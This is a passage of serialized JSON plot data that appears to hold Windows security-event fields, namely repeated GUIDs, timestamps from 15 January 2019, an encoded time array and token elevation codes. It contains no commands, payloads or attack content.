",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeCreatedUtc\":[\"2019-01-15 05:24:24.010\",\"2019-01-15 05:24:24.023\",\"2019-01-15 05:24:25.807\",\"2019-01-15 05:24:26.010\",\"2019-01-15 05:07:26.003\",\"2019-01-15 05:08:24.013\",\"2019-01-15 05:08:24.030\",\"2019-01-15 05:08:25.717\",\"2019-01-15 05:08:26.007\",\"2019-01-15 05:09:26.010\",\"2019-01-15 05:10:24.000\",\"2019-01-15 05:10:24.047\",\"2019-01-15 05:10:25.653\",\"2019-01-15 05:10:26.000\",\"2019-01-15 05:20:24.000\",\"2019-01-15 05:20:24.017\",\"2019-01-15 05:20:25.337\",\"2019-01-15 05:20:26.017\",\"2019-01-15 05:21:26.003\",\"2019-01-15 05:17:26.000\",\"2019-01-15 05:18:24.010\",\"2019-01-15 05:18:24.027\",\"2019-01-15 05:18:25.407\",\"2019-01-15 05:18:26.010\",\"2019-01-15 05:19:26.000\",\"2019-01-15 04:47:26.000\",\"2019-01-15 04:48:24.013\",\"2019-01-15 04:48:24.030\",\"2019-01-15 04:48:25.743\",\"2019-01-15 04:48:26.017\",\"2019-01-15 04:39:26.000\",\"2019-01-15 04:40:24.013\",\"2019-01-15 04:40:24.027\",\"2019-01-15 04:40:25.393\",\"2019-01-15 04:40:26.000\",\"2019-01-15 04:37:26.007\",\"2019-01-15 04:38:24.000\",\"2019-01-15 04:38:24.020\",\"2019-01-15 04:38:25.453\",\"2019-01-15 04:38:26.017\",\"2019-01-15 04:17:26.000\",\"2019-01-15 04:18:24.003\",\"2019-01-15 04:18:24.020\",\"2019-01-15 04:18:25.490\",\"2019-01-15 04:18:26.010\",\"2019-01-15 05:13:26.007\",\"2019-01-15 05:15:16.167\",\"2019-01-15 05:15:16.277\",\"2019-01-15 05:15:16.340\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.400\",\"2019-01-15 05:15:16.430\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.500\",\"2019-01-15 05:15:16.510\",\"2019-01-15 05:15:16.520\",\"2019-01-15 05:15:16.563\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:16.663\",\"2019-01-15 05:15:16.677\",\"2019-01-15 05:15:16.720\",\"2019-01-15 05:15:16.767\",\"2019-01-15 05:15:16.807\",\"2019-01-15 05:15:16.850\",\"2019-01-15 05:15:16.893\",\"2019-01-15 05:15:16.967\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:14:24.003\",\"2019-01-15 05:14:24.023\",\"2019-01-15 05:14:25.517\",\"2019-01-15 05:14:26.013\",\"2019-01-15 05:15:03.017\",\"2019-01-15 05:15:03.047\",\"2019-01-15 05:15:03.057\",\"2019-01-15 05:15:03.247\",\"2019-01-15 05:15:03.257\",\"2019-01-15 05:15:03.390\",\"2019-01-15 05:15:03.410\",\"2019-01-15 05:15:03.503\",\"2019-01-15 05:15:03.517\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.550\",\"2019-01-15 05:15:03.830\",\"2019-01-15 05:15:03.850\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:05.193\",\"2019-01-15 05:15:08.723\",\"2019-01-15 05:15:10.667\",\"2019-01-15 05:15:10.683\",\"2019-01-15 05:15:10.707\",\"2019-01-15 05:15:10.730\",\"2019-01-15 05:15:10.753\",\"2019-01-15 05:15:10.817\",\"2019-01-15 05:15:11.190\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:11.347\",\"2019-01-15 05:15:11.413\",\"2019-01-15 05:15:11.493\",\"2019-01-15 05:15:11.537\",\"2019-01-15 05:15:11.617\",\"2019-01-15 05:15:12.930\",\"2019-01-15 05:15:12.977\",\"2019-01-15 05:15:13.053\",\"2019-01-15 05:15:13.100\",\"2019-01-15 05:15:13.173\",\"2019-01-15 05:15:13.220\",\"2019-01-15 05:15:13.287\",\"2019-01-15 05:15:13.337\",\"2019-01-15 05:15:13.407\",\"2019-01-15 05:15:13.453\",\"2019-01-15 05:15:13.517\",\"2019-01-15 05:15:13.567\",\"2019-01-15 05:15:13.633\",\"2019-01-15 05:15:13.683\",\"2019-01-15 05:15:13.747\",\"2019-01-15 05:15:13.793\",\"2019-01-15 05:15:13.867\",\"2019-01-15 05:15:11.767\",\"2019-01-15 05:15:11.833\",\"2019-01-15 05:15:11.947\",\"2019-01-15 05:15:12.003\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:12.123\",\"2019-01-15 05:15:12.160\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.337\",\"2019-01-15 05:15:12.393\",\"2019-01-15 05:15:12.460\",\"2019-01-15 05:15:12.513\",\"2019-01-15 04:35:15.673\",\"2019-01-15 04:35:16.060\",\"2019-01-15 04:35:26.010\",\"2019-01-15 05:15:12.610\",\"2019-01-15 05:15:12.670\",\"2019-01-15 05:15:12.740\",\"2019-01-15 05:15:12.847\",\"2019-01-15 05:15:15.160\",\"2019-01-15 05:15:15.183\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.440\",\"2019-01-15 05:15:15.457\",\"2019-01-15 05:15:15.483\",\"2019-01-15 05:15:15.500\",\"2019-01-15 05:15:15.520\",\"2019-01-15 05:15:15.533\",\"2019-01-15 05:15:15.553\",\"2019-01-15 05:15:15.570\",\"2019-01-15 05:15:15.620\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:15.827\",\"2019-01-15 05:15:15.880\",\"2019-01-15 05:15:15.923\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:15.967\",\"2019-01-15 05:15:16.020\",\"2019-01-15 05:15:16.067\",\"2019-01-15 05:15:16.117\",\"2019-01-15 05:15:17.217\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:17.363\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.520\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:17.650\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.147\",\"2019-01-15 05:15:18.230\",\"2019-01-15 04:36:24.010\",\"2019-01-15 04:36:24.027\",\"2019-01-15 04:36:25.517\",\"2019-01-15 04:36:26.000\",\"2019-01-15 04:49:26.010\",\"2019-01-15 04:50:24.000\",\"2019-01-15 04:50:24.017\",\"2019-01-15 04:50:25.693\",\"2019-01-15 04:50:26.010\",\"2019-01-15 04:33:26.003\",\"2019-01-15 04:33:32.463\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:18.337\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.450\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.553\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.670\",\"2019-01-15 05:15:18.707\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.820\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:06:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:42:25.437\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:20:25.423\",\"2019-01-15 04:20:26.007\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:01.517\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 04:28:25.770\",\"2019-01-15 04:28:26.013\",\"2019-01-15 04:28:33.090\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:12:25.590\",\"2019-01-15 05:12:26.003\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:30:26.000\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:16:26.007\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"2019-01-15 04:21:26.000\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 04:22:25.360\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:16:25.550\",\"2019-01-15 04:16:26.000\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:01:52.640\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:25.427\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\"],\"TimeGenerated\":{\"__ndarray__\":\"AKA0fP+EdkIAcDV8/4R2QgDwpHz/hHZCAKCxfP+EdkIAMKuD/oR2QgDQ1JH+hHZCAODVkf6EdkIAUD+S/oR2QgBwUZL+hHZCAKD3oP6EdkIAACCv/oR2QgDwIq/+hHZCAFCHr/6EdkIAAJ2v/oR2QgAAnEH/hHZCABCdQf+EdkIAkO9B/4R2QgAQGkL/hHZCADC/UP+EdkIAACcW/4R2QgCgUCT/hHZCALBRJP+EdkIA8Kck/4R2QgCgzST/hHZCAABzM/+EdkIAALNe/YR2QgDQ3Gz9hHZCAODdbP2EdkIA8Eht/YR2QgAQWm39hHZCAACD6fyEdkIA0Kz3/IR2QgCwrff8hHZCABAD+PyEdkIAACn4/IR2QgBwN8z8hHZCAABg2vyEdkIAQGHa/IR2QgDQutr8hHZCABDe2vyEdkIAAD+n+4R2QgAwaLX7hHZCAEBptfuEdkIAIMW1+4R2QgCg5bX7hHZCAHCP2/6EdkIAcHT2/oR2QgBQe/b+hHZCAEB/9v6EdkIAEID2/oR2QgAAg/b+hHZCAOCE9v6EdkIA8IX2/oR2QgBAifb+hHZCAOCJ9v6EdkIAgIr2/oR2QgAwjfb+hHZCAFCQ9v6EdkIAcJP2/oR2QgBQlPb+hHZCAACX9v6EdkIA8Jn2/oR2QgBwnPb+hHZCACCf9v6EdkIA0KH2/oR2QgBwpvb+hHZCAMCp9v6EdkIAUK32/oR2QgBwsPb+hHZCABCx9v6EdkIAMLjp/oR2QgBwuen+hHZCANAW6v6EdkIA0DXq/oR2QgCQPvP+hHZCAHBA8/6EdkIAEEHz/oR2QgDwTPP+hHZCAJBN8/6EdkIA4FXz/oR2QgAgV/P+hHZCAPBc8/6EdkIA0F3z/oR2QgBwX/P+hHZCAOBf8/6EdkIAYHHz/oR2QgCgcvP+hHZCALCb8/6EdkIAkMbz/oR2QgAwo/T+hHZCALAc9f6EdkIAsB31/oR2QgAwH/X+hHZCAKAg9f6EdkIAECL1/oR2QgAQJvX+hHZCAGA99f6EdkIAwEH1/oR2QgAwR/X+hHZCAFBL9f6EdkIAUFD1/oR2QgAQU/X+hHZCABBY9f6EdkIAIKr1/oR2QgAQrfX+hHZCANCx9f6EdkIAwLT1/oR2QgBQufX+hHZCAEC89f6EdkIAcMD1/oR2QgCQw/X+hHZCAPDH9f6EdkIA0Mr1/oR2QgDQzvX+hHZCAPDR9f6EdkIAENb1/oR2QgAw2fX+hHZCADDd9f6EdkIAEOD1/oR2QgCw5PX+hHZCAHBh9f6EdkIAkGX1/oR2QgCwbPX+hHZCADBw9f6EdkIAMHT1/oR2QgCwd/X+hHZCAAB69f6EdkIAcHr1/oR2QgBwevX+hHZCABCF9f6EdkIAkIj1/oR2QgDAjPX+hHZCABCQ9f6EdkIAkGWs/IR2QgDAfaz8hHZCAKDrrvyEdkIAIJb1/oR2QgDgmfX+hHZCAECe9f6EdkIA8KT1/oR2QgCANfb+hHZCAPA29v6EdkIAEDr2/oR2QgAwPfb+hHZCAFA/9v6EdkIAAEf2/oR2QgAQSPb+hHZCALBJ9v6EdkIAwEr2/oR2QgAATPb+hHZCANBM9v6EdkIAEE72/oR2QgAgT/b+hHZCAEBS9v6EdkIA0FX2/oR2QgDwWPb+hHZCABBc9v6EdkIAMF/2/oR2QgCAYvb+hHZCADBl9v6EdkIA4Gb2/oR2QgDwZ/b+hHZCAEBr9v6EdkIAMG72/oR2QgBQcfb+hHZCABC29v6EdkIAQLb2/oR2QgCQuPb+hHZCADC/9v6EdkIAIML2/oR2QgAQxfb+hHZCAFDH9v6EdkIAAMn2/oR2QgAgzPb+hHZCAMDM9v6EdkIAINH2/oR2QgAA7Pb+hHZCADDw9v6EdkIAYPX2/oR2QgCgFL38hHZCALAVvfyEdkIA0HK9/IR2QgAAkb38hHZCAKD/e/2EdkIAACiK/YR2QgAQKYr9hHZCANCRiv2EdkIAoKWK/YR2QgAwn5H8hHZCAPAyk/yEdkIA8Pj2/oR2QgDA+fb+hHZCAAD79v6EdkIAEPz2/oR2QgAwAPf+hHZCACAD9/6EdkIAQAb3/oR2QgAwCff+hHZCAJAJ9/6EdkIAYA73/oR2QgDgEPf+hHZCADAT9/6EdkIAIBf3/oR2QgBAGvf+hHZCADAd9/6EdkIAUCD3/oR2QgBwI/f+hHZCACAm9/6EdkIAQCn3/oR2QgBwLff+hHZCAMAw9/6EdkIAcDP3/oR2QgCQOvf+hHZCALA+9/6EdkIAcEH3/oR2QgAgRPf+hHZCABBH9/6EdkIA8En3/oR2QgAQTPf+hHZCAPCK9/6EdkIA0Nv4/oR2QgAQ7/X+hHZCAEDz9f6EdkIA0Pb1/oR2QgAw+/X+hHZCAFD/9f6EdkIAkAT2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAoAv2/oR2QgDQC/b+hHZCADAQ9v6EdkIAUBP2/oR2QgAAFfb+hHZCAFAY9v6EdkIAIB32/oR2QgAAX2b+hHZCAACIdP6EdkIAsIp0/oR2QgCg9nT+hHZCAAAFdf6EdkIAoMif/IR2QgDgyZ/8hHZCAPAqoPyEdkIAAEWg/IR2QgAAbxz8hHZCAACYKvyEdkIAEJkq/IR2QgCQCiv8hHZCAHAVK/yEdkIAAM8G/YR2QgAA+BT9hHZCABD5FP2EdkIAsE4V/YR2QgDQURX9hHZCAHB1Ff2EdkIAgAkf/YR2QgBQCh/9hHZCAAAbJP2EdkIAAIvE+4R2QgAAtNL7hHZCABC10vuEdkIA8AzT+4R2QgBwMdP7hHZCAABTdPyEdkIAoHyC/IR2QgCwfYL8hHZCACDjgvyEdkIAAPmC/IR2QgAAuzn8hHZCANBmQvyEdkIAMORH/IR2QgBA5Uf8hHZCAKBSSPyEdkIA0GFI/IR2QgAgHEr8hHZCAABDvv6EdkIAcGzM/oR2QgBwbcz+hHZCALDDzP6EdkIAYM/M/oR2QgAw6cz+hHZCAKAHV/yEdkIAcDBl/IR2QgBwMWX8hHZCAOCaZfyEdkIAAK1l/IR2QgAwBAf/hHZCAEAFB/+EdkIA0F4H/4R2QgBwgQf/hHZCAAAj//uEdkIA8E8D/IR2QgAATA38hHZCABBNDfyEdkIAsJ0N/IR2QgAAyQ38hHZCAABEMv2EdkIAEEUy/YR2QgCwuDL9hHZCAHDBMv2EdkIAwHs1/YR2QgCQfDX9hHZCAADX4fuEdkIAEAHw+4R2QgDgAfD7hHZCAABV8PuEdkIAoH3w+4R2QgAA84n7hHZCAHAcmPuEdkIAsB2Y+4R2QgDgfJj7hHZCAACZmPuEdkIAcOhe/4R2QgBw6V7/hHZCAHBcX/+EdkIAcGVf/4R2QgAAC27/hHZCAABLmf2EdkIAAHSn/YR2QgBAdaf9hHZCANDYp/2EdkIA0PGn/YR2QgAQfA7+hHZCADCkHP6EdkIAEKUc/oR2QgAw+Rz+hHZCAAAhHf6EdkIAABNJ/oR2QgAAPFf+hHZCAEA9V/6EdkIA0K5X/oR2QgBwuVf+hHZCAHDHK/6EdkIAAEgy/oR2QgAA8Dn+hHZCALDxOf6EdkIA0EA6/oR2QgAwbTr+hHZCAED6Ov6EdkIA4Po6/oR2QgAA49P9hHZCADAM4v2EdkIAQA3i/YR2QgAgaeL9hHZCAACJ4v2EdkIAAJe2/YR2QgAwwMT9hHZCAEDBxP2EdkIAUCHF/YR2QgBwPcX9hHZCAAAv8f2EdkIA0Fj//YR2QgDgWf/9hHZCADCx//2EdkIAoNX//YR2QgCwCkH9hHZCAHBnQf2EdkIA0O1B/YR2QgAQkU/9hHZCABCST/2EdkIAgABQ/YR2QgBwDVD9hHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"